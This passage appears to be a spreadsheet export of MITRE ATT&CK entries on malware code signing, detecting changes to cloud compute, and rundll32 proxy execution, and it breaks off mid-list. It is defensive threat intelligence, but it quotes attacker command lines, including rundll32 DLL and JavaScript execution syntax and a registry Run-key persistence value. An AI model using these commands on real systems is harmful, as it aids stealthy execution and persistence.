[CopyKittens](https://attack.mitre.org/groups/G0052) digitally signed an executable with a stolen certificate from legitimate company AI Squared.(Citation: ClearSky Wilted Tulip July 2017)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used code-signing certificates on its malware that are either forged due to weak keys or stolen. [Darkhotel](https://attack.mitre.org/groups/G0012) has also stolen certificates and signed backdoors and downloaders with them.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has used stolen certificates from Electrum Technologies GmbH to sign payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019)	
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has signed [Carbanak](https://attack.mitre.org/software/S0030) payloads with legally purchased code signing certificates. [FIN7](https://attack.mitre.org/groups/G0046) has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) has used stolen certificates to sign its tools including those from Whizzimo LLC.(Citation: Microsoft GALLIUM December 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has signed files with the name EGIS CO,. Ltd..(Citation: ThreatConnect Kimsuky September 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has digitally signed malware and utilities to evade detection.(Citation: Lazarus APT January 2022)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used stolen code signing certificates to sign malware.(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has signed their malware with a valid digital signature.(Citation: Kaspersky LuminousMoth July 2021)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has used forged Microsoft code-signing certificates on malware.(Citation: FireEye Operation Molerats)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has used signed drivers from an open source tool called DiskCryptor to evade detection.(Citation: Checkpoint MosesStaff Nov 2021)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has signed code with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)
Scattered Spider
[Scattered Spider](https://attack.mitre.org/groups/G1015) has used self-signed and stolen certificates originally issued to NVIDIA and Global Software LLC.(Citation: CrowdStrike Scattered Spider BYOVD January 2023)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).(Citation: Group IB Silence Aug 2019)
Suckfly
[Suckfly](https://attack.mitre.org/groups/G0039) has used stolen certificates to sign its malware.(Citation: Symantec Suckfly March 2016)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has signed payloads with code signing certificates from Thawte and Sectigo.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)
Winnti Group
[Winnti Group](https://attack.mitre.org/groups/G0044) used stolen certificates to sign its malware.(Citation: Kaspersky Winnti April 2013)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Digicert code-signing certificates for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.(Citation: Securelist APT10 March 2021)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has been signed with valid certificates to evade detection by security tools.(Citation: Cyberreason Anchor December 2019)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has used a valid digital signature from Sectigo to appear legitimate.(Citation: CISA AppleJeus Feb 2021) 
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been signed with code-signing certificates such as CodeRipper.(Citation: US-CERT BLINDINGCAN Aug 2020)
BOOSTWRITE
[BOOSTWRITE](https://attack.mitre.org/software/S0415) has been signed by a valid CA.(Citation: FireEye FIN7 Oct 2019)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) was signed with valid Certum certificates.(Citation: CheckPoint Bandook Nov 2020) 
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.(Citation: Cybereason Bazar July 2020)
Black Basta
The [Black Basta](https://attack.mitre.org/software/S1070) dropper has been digitally signed with a certificate issued by Akeo Consulting for legitimate executables used for creating bootable USB drives.(Citation: Check Point Black Basta October 2022)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) has come signed with revoked certificates.(Citation: Cybereason Kimsuky November 2020)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)
Clop
[Clop](https://attack.mitre.org/software/S0611) can use code signing to evade detection.(Citation: Unit42 Clop April 2021)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Daserf
Some [Daserf](https://attack.mitre.org/software/S0187) samples were signed with a stolen digital certificate.(Citation: Symantec Tick Apr 2016)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has installed a self-signed RPM package mimicking the original system package on RPM based systems.(Citation: ESET Ebury Feb 2014)
Ecipekac
[Ecipekac](https://attack.mitre.org/software/S0624) has used a valid, legitimate digital signature to evade detection.(Citation: Securelist APT10 March 2021)
Epic
[Turla](https://attack.mitre.org/groups/G0010) has used valid digital certificates from Sysprint AG to sign its [Epic](https://attack.mitre.org/software/S0091) dropper.(Citation: Kaspersky Turla)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) versions are signed with various valid certificates; one was likely faked and issued by Comodo for "Solid Loop Ltd," and another was issued for "Ultimate Computer Support Ltd."(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) digitally signs the malware with a code-signing certificate.(Citation: ESET GreyEnergy Oct 2018)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.(Citation: ClearSky OilRig Jan 2017)
HermeticWiper
The [HermeticWiper](https://attack.mitre.org/software/S0697) executable has been signed with a legitimate certificate issued to Hermetica Digital Ltd.(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) has been signed by valid certificates assigned to Hermetica Digital.(Citation: ESET Hermetic Wizard March 2022)
Janicab
[Janicab](https://attack.mitre.org/software/S0163) used a valid AppleDeveloperID to sign the code to get past security restrictions.(Citation: Janicab)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) has been signed with stolen certificates in order to make it look more legitimate.(Citation: Wired Lockergoga 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using AVAST Software certificates.(Citation: Medium Metamorfo Apr 2020) 
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.(Citation: Security Intelligence More Eggs Aug 2019)
Nerex
[Nerex](https://attack.mitre.org/software/S0210) drops a signed Microsoft DLL to disk.(Citation: Symantec Nerex May 2012)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501), its installer, and tools are signed with stolen code-signing certificates.(Citation: ESET PipeMon May 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use signed loaders to evade detection.(Citation: ATT QakBot April 2021)(Citation: Deep Instinct Black Basta August 2022)
QuasarRAT
A [QuasarRAT](https://attack.mitre.org/software/S0262) .dll file is digitally signed by a certificate from AirVPN.(Citation: Volexity Patchwork June 2018)
RTM
[RTM](https://attack.mitre.org/software/S0148) samples have been signed with a code-signing certificates.(Citation: ESET RTM Feb 2017)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) was digitally signed by SolarWinds from March - May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) has been signed with valid digital certificates.(Citation: Secureworks GOLD KINGSWOOD September 2018)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has been signed with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) used a digitally signed driver with a compromised Realtek certificate.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has been signed with stolen digital certificates.(Citation: Lunghi Iron Tiger Linux)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has come with a signed downloader component.(Citation: Cyberreason Anchor December 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Metadata
Monitor for quota increases across all regions, especially multiple quota increases in a short period of time or quota increases in unused regions. Monitor for changes to tenant-level settings such as subscriptions and enabled regions.(Citation: Microsoft Cryptojacking 2023)
Instance Creation
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search) (Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)
Instance Deletion
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search) (Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)
Instance Metadata
Periodically baseline instances to identify malicious modifications or additions.
Instance Modification
Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Instance Start
Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to activation of instances that are occurring outside of normal activity/planned operations. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Instance Stop
Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to deactivation of instances that are occurring outside of planned operations. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Snapshot Creation
Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Snapshot Deletion
Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the deletion of multiple snapshots within a short period of time. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Snapshot Metadata
Periodically baseline snapshots to identify malicious modifications or additions.
Snapshot Modification
Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the mounting of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Volume Creation
Monitor for the unexpected creation or presence of cloud block storage volumes . To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Volume Deletion
Monitor for the unexpected deletion or absence of cloud block storage volumes . To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Volume Metadata
Periodically baseline cloud block storage volumes to identify malicious modifications or additions.
Volume Modification
Monitor for the unexpected changes to cloud block storage volumes . To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
Audit
Routinely monitor user permissions to ensure only the expected users have the capability to modify cloud compute infrastructure components.
User Account Management
Limit permissions for creating, deleting, and otherwise altering compute components in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Typical command-line usage of rundll32.exe is &lt;code&gt;"rundll32.exe DllFile,EntryPoint"&lt;/code&gt; where &lt;code&gt;DllFile&lt;/code&gt; is the name of the DLL file being called and EntryPoint the name of the entry point in the DLL file. 
DLLs stored on SMB shares can similarly be called using the syntax of &lt;code&gt;"rundll32.exe \\&lt;ip_address&gt;\DllFile,EntryPoint"&lt;/code&gt; where &lt;ip_address&gt; is the IPv4 address of the host of the SMB share. 
Rundll32 can also be used to execute arbitrary Javascript using the syntax &lt;code&gt;"rundll32.exe javascript:&lt;*code_block*&gt;"&lt;/code&gt;where &lt;*code_block*&gt; is a string defining the Javascript code to be executed.  
File Metadata
Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.
Module Load
Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls. Static Portable Executable (PE) analysis tools can be used to examine and dump the exports of a particular DLL. 
Process Creation
Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. 
When monitoring for all instances of Rundll32 execution, as defined by the logic in the Detection Pseudocode, it is imperative to also investigate the full set of command-line parameters used. These parameters contain key information about the DLL payload, including the name, entry point, and optional arguments.
Note: Event IDs are for Sysmon (Event ID 10 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of rundll32.exe but does no other filtering, which may result in false positives. Therefore, we recommend tuning any such analytics by including additional logic (e.g., testing the name of the user that created the process) that helps reduce false positives.
&lt;h4&gt;Analytic 1 - RunDLL32.exe Monitoring &lt;/h4&gt; 
&lt;code&gt; processes = filter process where ((event_id == "1" OR event_id == "4688") AND exe == "rundll32.exe")&lt;/code&gt;
Exploit Protection
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using `rundll32.exe`. (Citation: Booz Allen Hamilton)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors loaded DLLs via `rundll32` using the `svchost` process.(Citation: DFIR Conti Bazar Nov 2021)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used `rundll32` to run [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Costa AvosLocker May 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used `rundll32.exe` to execute the [Cobalt Strike](https://attack.mitre.org/software/S0154) Beacon loader DLL.(Citation: FireEye APT29 Nov 2018)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) executed malware with `C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used `rundll32.exe` to execute malicious installers.(Citation: ESET Operation Spalax Jan 2021)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `Rundll32.exe` to execute payloads.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Microsoft Deep Dive Solorigate January 2021)
APT19
[APT19](https://attack.mitre.org/groups/G0073) configured its payload to inject into the rundll32.exe.(Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) executed [CHOPSTICK](https://attack.mitre.org/software/S0023) by using rundll32 commands such as &lt;code&gt;rundll32.exe “C:\Windows\twain_64.dll”&lt;/code&gt;. [APT28](https://attack.mitre.org/groups/G0007) also executed a .dll for a first stage dropper using rundll32.exe. An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.(Citation: Crowdstrike DNC June 2016)(Citation: Bitdefender APT28 Dec 2015)(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit 42 Playbook Dec 2017)(Citation: ESET Zebrocy May 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can run DLLs.(Citation: FireEye Clandestine Fox)
APT32
[APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockingbird May 2020)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) installs VNC server software that executes through rundll32.(Citation: Kaspersky Carbanak)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.(Citation: ClearSky Wilted Tulip July 2017)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used `rundll32.exe` to execute malware on a compromised network.(Citation: Mandiant FIN7 Apr 2022) 
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon June 2020)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used &lt;code&gt;rundll32&lt;/code&gt; to load malicious DLLs.(Citation: Volexity Exchange Marauder March 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used rundll32 to execute malicious payloads on a compromised host.(Citation: ESET Twitter Ida Pro Nov 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used `rundll32.exe` to execute [Koadic](https://attack.mitre.org/software/S0250) stagers.(Citation: MalwareBytes LazyScripter Feb 2021) 
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.(Citation: DFIR Report APT35 ProxyShell March 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.(Citation: Securelist MuddyWater Oct 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots July 2017)	
TA505
[TA505](https://attack.mitre.org/groups/G0092) has leveraged &lt;code&gt;rundll32.exe&lt;/code&gt; to execute malicious DLLs.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used rundll32.exe to load malicious DLLs.(Citation: Unit 42 TA551 Jan 2021)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized `rundll32.exe` to deploy ransomware commands with the use of WebDAV.(Citation: Mandiant FIN12 Oct 2021)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT28 Dec 2015)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used Rundll32 to load a malicious DLL.(Citation: US-CERT BLINDINGCAN Aug 2020)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can use rundll32 for execution on compromised hosts.(Citation: Gigamon Berserk Bear October 2021)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has used rundll32 to launch a malicious DLL as &lt;code&gt;C:Windowsinfpub.dat&lt;/code&gt;.(Citation: Secure List Bad Rabbit)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used rundll32.exe to execute as part of the Registry Run key it adds: &lt;code&gt;HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”&lt;/code&gt;.(Citation: Unit 42 Bisonal July 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can use RunDLL32 for execution.(Citation: MSTIC Nobelium Toolset May 2021)
Briba
[Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) entries to execute malicious DLLs.(Citation: Symantec Briba May 2012)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has used `rundll32` for execution of the loader component.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) is installed via execution of rundll32 with an export named "init" or "InitW."(Citation: Microsoft SIR Vol 19)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use `rundll32.exe` to load DLL from the command line.(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)(Citation: Trend Micro Black Basta October 2022)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses Rundll32 to load a malicious DLL.(Citation: Palo Alto Comnie)
CozyCar
The [CozyCar](https://attack.mitre.org/software/S0046) dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main [CozyCar](https://attack.mitre.org/software/S0046) component.(Citation: F-Secure CozyDuke)
DDKONG
[DDKONG](https://attack.mitre.org/software/S0255) uses Rundll32 to ensure only a single instance of itself is running at once.(Citation: Rancor Unit42 June 2018)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can use `rundll32.exe` for execution of living off the land binaries (lolbin) such as `SHELL32.DLL`.(Citation: Mandiant APT41)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can execute commands and scripts through rundll32.(Citation: Prevailion EvilNum May 2020) 
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020)
Elise
After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lotus Blossom Jun 2015)
Emissary
Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Emissary Trojan Feb 2016)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) has the ability to proxy execution of malicious files with Rundll32.(Citation: MSTIC Nobelium Toolset May 2021)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) uses Rundll32 for executing the dropper program.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can execute via rundll32.(Citation: ESET Dukes October 2019)
Flame
Rundll32.exe is used as a way of executing [Flame](https://attack.mitre.org/software/S0143) at the command-line.(Citation: Crysys Skywiper)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used `rundll32` for execution.(Citation: Korean FSI TA505 2020)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can use `rundll32` for execution of its components.(Citation: Bitdefender FunnyDream Campaign November 2020)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).(Citation: ESET GreyEnergy Oct 2018)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to create a new process using `rundll32`.(Citation: ESET Hermetic Wizard March 2022)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use rundll32.exe to gain execution.(Citation: SentinelOne Aoqin Dragon June 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) is executed using rundll32.exe.(Citation: F-Secure Sofacy 2015)(Citation: Talos Seduploader Oct 2017)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can use Rundll32 to execute additional payloads.(Citation: Github Koadic)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) uses rundll32.exe in a Registry value added to establish persistence.(Citation: Symantec Orangeworm April 2018)
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.(Citation: CopyKittens Nov 2015)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;rundll32.exe&lt;/code&gt; to load a DLL for file encryption.(Citation: IBM MegaCortex)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) can use `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citation: ESET Turla Mosquito Jan 2018)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) has used rundll32 for execution.(Citation: Unit 42 NOKKI Sept 2018)
NativeZone
[NativeZone](https://attack.mitre.org/software/S0637) has used rundll32 to execute a malicious DLL.(Citation: SentinelOne NobleBaron June 2021)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;rundll32.exe&lt;/code&gt; to install itself on remote systems when accessed via [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt;.(Citation: Talos Nyetya June 2017)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has used `rundll32.exe` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)
PolyglotDuke
[PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) executes functions using rundll32.exe.(Citation: Palo Alto Gamaredon Feb 2017)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has used Rundll32.exe to drop malicious DLLs including [Brute Ratel C4](https://attack.mitre.org/software/S1063) and to enable C2 communication.(Citation: Crowdstrike Qakbot October 2020)(Citation: Red Canary Qbot)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Trend Micro Black Basta October 2022)
RTM
